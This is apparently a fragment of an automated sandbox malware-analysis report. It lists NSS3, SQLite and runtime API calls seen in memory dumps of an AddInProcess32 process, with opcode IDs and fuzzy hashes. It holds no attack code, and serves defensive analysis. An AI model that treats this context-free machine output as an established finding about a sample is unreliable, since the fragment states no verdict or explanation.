                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Calloc$Cond$CriticalDestroyEnterErrorLockSectionUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 57979654-0
                                                                                      • Opcode ID: b8bc3d58f5b03a8525f8eb4a0fa0b181f9013aafbe94cc5ccdbb9bda976d02b7
                                                                                      • Instruction ID: 8ebeda94ebcbb02be6b5e263cfa5eb37f4224c52848639e16ff38a33a34f1875
                                                                                      • Opcode Fuzzy Hash: b8bc3d58f5b03a8525f8eb4a0fa0b181f9013aafbe94cc5ccdbb9bda976d02b7
                                                                                      • Instruction Fuzzy Hash: 8031DE71501701AFEB10AF25DC40A8A7BF8FB45358F12892EFA4A96A50FB31E844CB90
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000001,?,?,?,6CD23908,00000000,00000000,00000000,00000000,?,00000001), ref: 6CD22DE9
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6CD22E29
                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CD22E9E
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001), ref: 6CD22EA7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena_CertificateDestroyErrorError_FreeItem_
                                                                                      • String ID:
                                                                                      • API String ID: 2738029599-0
                                                                                      • Opcode ID: b61821fc5dfa216f938be7bd4f72c919a8e08b2c84f7b811c8b3770331ed60ab
                                                                                      • Instruction ID: 049db1ea7e71d8ee9495e4213e10d90193dbcca3d6388618e185c295169a9c92
                                                                                      • Opcode Fuzzy Hash: b61821fc5dfa216f938be7bd4f72c919a8e08b2c84f7b811c8b3770331ed60ab
                                                                                      • Instruction Fuzzy Hash: 64212972518201FBD714AF55DC8499AB778EF4477CB24402AFA1897F60EB35E84097E0
                                                                                      APIs
                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,?,00000000,?,6CD22FEF,?,00000000,00000000,?,00000000,00000000,00000000,?,6CD2370F,00000000), ref: 6CD2293F
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000008,00000000,?,00000000,?,6CD22FEF,?,00000000,00000000,?,00000000,00000000,00000000,?,6CD2370F), ref: 6CD2295C
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • PORT_ArenaGrow_Util.NSS3(00000000,00000000,00000000,00000000,00000000,?,00000000,?,6CD22FEF,?,00000000,00000000,?,00000000,00000000,00000000), ref: 6CD22984
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000010,00000000,00000000,?), ref: 6CD22998
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000008,00000000,00000000,?), ref: 6CD229B3
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?,00000000,00000000,?), ref: 6CD229F7
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,?,00000000,?,6CD22FEF,?,00000000,00000000,?,00000000,00000000,00000000,?,6CD2370F,00000000), ref: 6CD22A06
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$CopyError_FindGrow_Item_Tag_memset
                                                                                      • String ID:
                                                                                      • API String ID: 2657543331-0
                                                                                      • Opcode ID: 0d2f01bb1ef71e0df99d86ae226dab65caddf4ae9f53b4bbcc107a1857fbd4dc
                                                                                      • Instruction ID: 0f2cf95873343b69f4bd26011af464e6edcfa4b65ecbc1977d846c219e6e3998
                                                                                      • Opcode Fuzzy Hash: 0d2f01bb1ef71e0df99d86ae226dab65caddf4ae9f53b4bbcc107a1857fbd4dc
                                                                                      • Instruction Fuzzy Hash: D83158712087019FDB24CF29D884A5277F2FB4832CB15852DE6658BEB1DB32F849CB50
                                                                                      APIs
                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?,?,00000000,?,6CCE219E,00000000,?,?,?), ref: 6CCE2E3E
                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?,00000004,?,00000000,?,6CCE219E,00000000,?,?,?), ref: 6CCE2E5C
                                                                                        • Part of subcall function 6CD1BADB: memcmp.VCRUNTIME140(00000000,00000000,?,?,?,?,6CCDD78C,?,?), ref: 6CD1BB1D
                                                                                      • CERT_DecodeAVAValue.NSS3(?,00000004,?,00000000,?,6CCE219E,00000000,?,?,?), ref: 6CCE2E95
                                                                                        • Part of subcall function 6CCE3333: PORT_SetError_Util.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE34D2
                                                                                      • CERT_DecodeAVAValue.NSS3(?,?,00000004,?,00000000,?,6CCE219E,00000000,?,?,?), ref: 6CCE2E9F
                                                                                        • Part of subcall function 6CCE3333: PORT_InitCheapArena.NSS3(?,00000800,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE33E7
                                                                                        • Part of subcall function 6CCE3333: SEC_QuickDERDecodeItem_Util.NSS3(?,?,00000000,00000000,?,00000800,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE33F8
                                                                                        • Part of subcall function 6CCE3333: PORT_DestroyCheapArena.NSS3(?,?,?,?,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE3408
                                                                                      • SECITEM_CompareItem_Util.NSS3(00000000,00000000,00000004,?,00000000,?,6CCE219E,00000000,?,?,?), ref: 6CCE2EC8
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,00000004,?,00000000,?,6CCE219E,00000000,?,?,?), ref: 6CCE2ED4
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,00000000,00000001,00000004,?,00000000,?,6CCE219E,00000000,?,?,?), ref: 6CCE2EDC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Item_$CompareDecode$ArenaCheapFreeValue$DestroyError_InitQuickmemcmp
                                                                                      • String ID:
                                                                                      • API String ID: 4095437298-0
                                                                                      • Opcode ID: 6170fb74e67e59a3029378400a023d0a2e90e25ce8dd4fc028c019bc937e9731
                                                                                      • Instruction ID: 542b4b2f0df5322d3bcbbd9d7c4f8343dad22f3d9c52172bc0068ce84fee15ce
                                                                                      • Opcode Fuzzy Hash: 6170fb74e67e59a3029378400a023d0a2e90e25ce8dd4fc028c019bc937e9731
                                                                                      • Instruction Fuzzy Hash: E5210E35109713AFFB208B749454B9673E4EF0A229B24C42EF8258BF80FB71E481C760
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCC889A
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_Lock.NSS3(?), ref: 6CCC88AB
                                                                                      • PR_NotifyAllCondVar.NSS3(?), ref: 6CCC88D5
                                                                                      • PR_NotifyAllCondVar.NSS3(?,?), ref: 6CCC88DD
                                                                                      • PR_SetError.NSS3(FFFFE8D4,00000000), ref: 6CCC8928
                                                                                      • PR_Unlock.NSS3(?), ref: 6CCC894A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CondErrorNotify$CurrentLockThreadUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 483565141-0
                                                                                      • Opcode ID: 6b3f24e211816118daef4f68ebd00d7c3807f34dc7f104571c413f50d6d3c16e
                                                                                      • Instruction ID: 81f5d15e3a21a66d80612780ae05eef2197dd57626c2733d08ae0aa50cf1cba1
                                                                                      • Opcode Fuzzy Hash: 6b3f24e211816118daef4f68ebd00d7c3807f34dc7f104571c413f50d6d3c16e
                                                                                      • Instruction Fuzzy Hash: 3A218C75608701AFCB209F19D880C47B7F4FB85768325472AE19647E90FB71B845CB96
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(?,00000000,?,00000000,00000018,?,6CCE792B,00000004,00000000,?,00000000,?,00000000,00000000,00000004,00000018), ref: 6CCE8F99
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,?,00000000,00000018,?,6CCE792B,00000004,00000000,?,00000000,?,00000000,00000000,00000004,00000018), ref: 6CCE8FCB
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,00000000,00000000,?,00000000,00000018,?,6CCE792B,00000004,00000000,?,00000000,?,00000000,00000000,00000004), ref: 6CCE8FD9
                                                                                      • SECITEM_AllocItem_Util.NSS3(?,?,00000000,00000000,?,00000000,00000018,?,6CCE792B,00000004,00000000,?,00000000,?,00000000,00000000), ref: 6CCE8FE4
                                                                                        • Part of subcall function 6CD1B99E: PORT_ArenaMark_Util.NSS3(?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000,?,6CCDCB3B,?), ref: 6CD1B9B1
                                                                                        • Part of subcall function 6CD1B99E: PORT_ArenaZAlloc_Util.NSS3(?,0000000C,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000,?,6CCDCB3B), ref: 6CD1B9C8
                                                                                        • Part of subcall function 6CD1B99E: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000,?,6CCDCB3B), ref: 6CD1B9F0
                                                                                        • Part of subcall function 6CD1B99E: PORT_ArenaRelease_Util.NSS3(?,00000000,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000,?,6CCDCB3B), ref: 6CD1BA12
                                                                                      • PK11_HashBuf.NSS3(00000000,?,?,?,00000000,?,00000000,00000000,00000004,00000018), ref: 6CCE9002
                                                                                      • PT_FPrintStats.NSS3(?,00000000,?,?,?,?,00000000,?,00000000,00000000,00000004,00000018), ref: 6CCE9016
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000000,00000000,?,00000000,00000018,?,6CCE792B,00000004,00000000,?,00000000,?,00000000,00000000,00000004), ref: 6CCE9033
                                                                                        • Part of subcall function 6CD1BC6A: PORT_Free_Util.NSS3(?,?,?,6CCDD30A,?,00000000,?,?,00000000,?,6CCDCB3B,?,?), ref: 6CD1BC78
                                                                                        • Part of subcall function 6CD1BC6A: PORT_Free_Util.NSS3(00000000,?,?,6CCDD30A,?,00000000,?,?,00000000,?,6CCDCB3B,?), ref: 6CD1BC8D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_Free_Item_Mark_Release_$AllocError_FreeHashK11_LockPrintStatsUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 2460975099-0
                                                                                      • Opcode ID: a48460ea3f134179256782484200911c2452d45a8e8ed6cf66727b8e08efc331
                                                                                      • Instruction ID: 48d99a6f63fd63cf2ae11478142612f3c582181ba23b083f1deb37ca5ad67803
                                                                                      • Opcode Fuzzy Hash: a48460ea3f134179256782484200911c2452d45a8e8ed6cf66727b8e08efc331
                                                                                      • Instruction Fuzzy Hash: A4213832605611AB9B158F59ED80DBFB7BAEF8E6287204129FC1497F10FB32CC4196A0
                                                                                      APIs
                                                                                      • sqlite3_result_int.NSS3(?,00000000), ref: 6CC66B28
                                                                                      • sqlite3_data_count.NSS3(?), ref: 6CC66B46
                                                                                      • sqlite3_column_value.NSS3(?,?), ref: 6CC66B58
                                                                                      • sqlite3_result_value.NSS3(?,00000000,?,?), ref: 6CC66B61
                                                                                      • sqlite3_result_int64.NSS3(?,?,?), ref: 6CC66B71
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_column_valuesqlite3_data_countsqlite3_result_intsqlite3_result_int64sqlite3_result_value
                                                                                      • String ID: fts3cursor
                                                                                      • API String ID: 2732092029-1574267913
                                                                                      • Opcode ID: 48feb543b722a04e15bad0944ea6660d561940f3f6e2dfc46809ec75166a86c8
                                                                                      • Instruction ID: d2dcc731e7e75382d38e98f3cd67502412211fe1cc43b1f1e162bb89995374de
                                                                                      • Opcode Fuzzy Hash: 48feb543b722a04e15bad0944ea6660d561940f3f6e2dfc46809ec75166a86c8
                                                                                      • Instruction Fuzzy Hash: 98117272505915FB8B014E6BEEC0C9DBB69FF85778320421AF518D6E10E732D925EB90
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE89D,?), ref: 6CD1FE18
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_Calloc.NSS3(00000001,00000014), ref: 6CD1FE2B
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CD1FE3E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$CallocCurrentThread
                                                                                      • String ID:
                                                                                      • API String ID: 1139103531-0
                                                                                      • Opcode ID: b2f6fbb5cb629d2fa96e7a482c37d2ccce5a0354911a1661fc5d45b90cd72283
                                                                                      • Instruction ID: c9c8ea26dfa5510171eaf2f2d3725ddd740e8c51e1a7343b2d71a0cc0fc81ba2
                                                                                      • Opcode Fuzzy Hash: b2f6fbb5cb629d2fa96e7a482c37d2ccce5a0354911a1661fc5d45b90cd72283
                                                                                      • Instruction Fuzzy Hash: 9D11877260C701AFD3249F2DA841547BBE4FB497747204A2EE59AC3F91E730E4448BA9
                                                                                      APIs
                                                                                      • ___scrt_fastfail.LIBCMT ref: 6CD4EE0B
                                                                                      • __RTC_Initialize.LIBCMT ref: 6CD4EE23
                                                                                      • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 6CD4EE2D
                                                                                      • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CD50404,6CD50408,6CD79C78,00000010,6CD4EDB8,?,?,?,6CD4EFAA,?,00000001,?,?,00000001,?,6CD79CB8), ref: 6CD4EE3C
                                                                                      • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CD503FC,6CD50400,6CD79C78,00000010,6CD4EDB8,?,?,?,6CD4EFAA,?,00000001,?,?,00000001,?,6CD79CB8), ref: 6CD4EE5A
                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CD4EE91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                      • String ID:
                                                                                      • API String ID: 817586116-0
                                                                                      • Opcode ID: f7739a3a364b936ebb92ef674be281437f2ec661847ccce6a86984e7f12d7af4
                                                                                      • Instruction ID: 6fae8a02a012ab06ca8f494c61d3eca808d9f4b303f5b23b2990c521b696f688
                                                                                      • Opcode Fuzzy Hash: f7739a3a364b936ebb92ef674be281437f2ec661847ccce6a86984e7f12d7af4
                                                                                      • Instruction Fuzzy Hash: CB11DD31186245AAFF00EBB8C904BCDB7624F0625CF60C82DD7882BEF1DB35518D86B6
                                                                                      APIs
                                                                                      • CERT_DupCertificate.NSS3(?), ref: 6CCE5C48
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CCE5C59
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CCE5CC3
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$CertificateError
                                                                                      • String ID:
                                                                                      • API String ID: 192774420-0
                                                                                      • Opcode ID: 8b3b9a14663b284340bd4cb803d867abdefb385e450d8c868356f9eee9f83370
                                                                                      • Instruction ID: 880ee9f73666c82819274d9d125a3eaa01d1cf95d1a97ba9e32d06f568ec38de
                                                                                      • Opcode Fuzzy Hash: 8b3b9a14663b284340bd4cb803d867abdefb385e450d8c868356f9eee9f83370
                                                                                      • Instruction Fuzzy Hash: B1110C31F095056B9B019FA99D9089D72A4EF4E378B24053BED05D6F10FB648A0186A0
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CD1BD2F
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD1BD52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ErrorError_Free_
                                                                                      • String ID:
                                                                                      • API String ID: 1317074107-0
                                                                                      • Opcode ID: 178370ffda0f2982715ad13f0004b496d8fc0d6874f3b57bd2aa8da9c09438c9
                                                                                      • Instruction ID: 76fa9b342fbbadd7d3d7b333ed92c72fd97aa67033aeb61b38100e6dd813e1a5
                                                                                      • Opcode Fuzzy Hash: 178370ffda0f2982715ad13f0004b496d8fc0d6874f3b57bd2aa8da9c09438c9
                                                                                      • Instruction Fuzzy Hash: E111C8B156CA00FADB259F25F800B9777B4EF81779B20856EE4AA86FF0D730D040CA61
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Malloc$InitLock
                                                                                      • String ID:
                                                                                      • API String ID: 2802791688-0
                                                                                      • Opcode ID: 1a4e24931fe5959c578bb67583048fcbe4666f857514bf3ac3d423de626dcd19
                                                                                      • Instruction ID: eb5d228a148d28e40e2e1054d14513475d3d6d34a03ae6573dc432ed4102f454
                                                                                      • Opcode Fuzzy Hash: 1a4e24931fe5959c578bb67583048fcbe4666f857514bf3ac3d423de626dcd19
                                                                                      • Instruction Fuzzy Hash: E3016B36608B424AE7055F2FD04039B77A45F8336DF29422DC28A8BF02FB22B046C351
                                                                                      APIs
                                                                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,6CD5B8D4,00000000,?,6CCC7FBB,00000000,?), ref: 6CCC7D80
                                                                                      • setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000004,00000000,00000000,?), ref: 6CCC7D95
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6CCC7DA9
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CCC7DBA
                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CCC7DD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: __acrt_iob_func$fclosefopensetvbuf
                                                                                      • String ID: WinDebug
                                                                                      • API String ID: 865381061-2102910228
                                                                                      • Opcode ID: dbc368a9cacc161f58618f501b58a854b237c6631662235e1c136a4aba6cfee7
                                                                                      • Instruction ID: 5caa527c558e4b9e99c074de9cec3c0ce3df5b0e0bffda7d258f62ae81cec4db
                                                                                      • Opcode Fuzzy Hash: dbc368a9cacc161f58618f501b58a854b237c6631662235e1c136a4aba6cfee7
                                                                                      • Instruction Fuzzy Hash: C0110471755210ABFF192634984577877FCEB03769FA0029FF612999D0EB70A440D792
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?,00000000,00000000,00000000,?,6CCE328A,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C9C3
                                                                                      • PL_ClearArenaPool.NSS3(?,00000000,00000000,00000000,00000000,?,6CCE328A,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C9D3
